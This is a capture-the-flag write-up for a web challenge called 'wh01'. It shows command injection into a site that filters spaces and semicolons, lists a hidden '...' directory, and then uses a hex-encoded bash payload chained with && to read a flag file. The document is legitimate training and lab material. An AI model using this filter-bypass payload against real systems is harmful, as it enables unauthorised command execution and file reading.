+++
title = "wh01"
+++

Description:

>Access the site at https://ggcs-wh01.allyourbases.co and find and then read the contents of the flag file to get the flag.

It's our old friend from [wm01](../wm01), but with an upgrade. No more spaces or semicolons, it would appear.

Still injectible, though -- `-al` still shows us everything, and, what ho!, there's a ~special~ folder called `...` now.
```text
total 5
drwxr-xr-x  3 root root   52 May  1 14:05 .
drwxr-xr-x 24 root root 4096 Apr 11 01:54 ..
drwxr-xr-x  2 root root   32 Apr 14 03:07 ...
-rw-r--r--  1 root root  947 May  1 14:05 lambda_function.py
```

Let's see what's in it with `-alR`:
```text
.:
total 5
drwxr-xr-x  3 root root   52 May  1 14:05 .
drwxr-xr-x 24 root root 4096 Apr 11 01:54 ..
drwxr-xr-x  2 root root   32 Apr 14 03:07 ...
-rw-r--r--  1 root root  947 May  1 14:05 lambda_function.py

./...:
total 1
drwxr-xr-x 2 root root 32 Apr 14 03:07 .
drwxr-xr-x 3 root root 52 May  1 14:05 ..
-rw-r--r-- 1 root root 22 Apr 14 03:04 .flag.txt
```

Interesting. Only problem is, we can't cat it without a space.

So let's just encode it, I guess (encoded text is ` .../.flag.txt` -- mind the space):
```bash
>/dev/null&&CMD=$'\x20\x2e\x2e\x2e\x2f\x2e\x66\x6c\x61\x67\x2e\x74\x78\x74'&&cat$CMD
```
```text
SCUffeD_FiLTERing_1000
```
